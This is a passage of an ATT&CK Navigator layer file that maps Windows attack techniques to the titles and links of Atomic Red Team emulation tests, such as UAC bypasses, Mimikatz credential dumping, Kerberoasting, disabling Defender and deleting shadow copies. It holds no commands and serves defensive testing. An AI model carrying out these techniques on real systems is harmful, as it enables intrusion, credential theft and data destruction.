MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - 
Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT 
Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies 
(Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process 
cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- 
Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable 
UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in 
Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - 
Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":57,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows 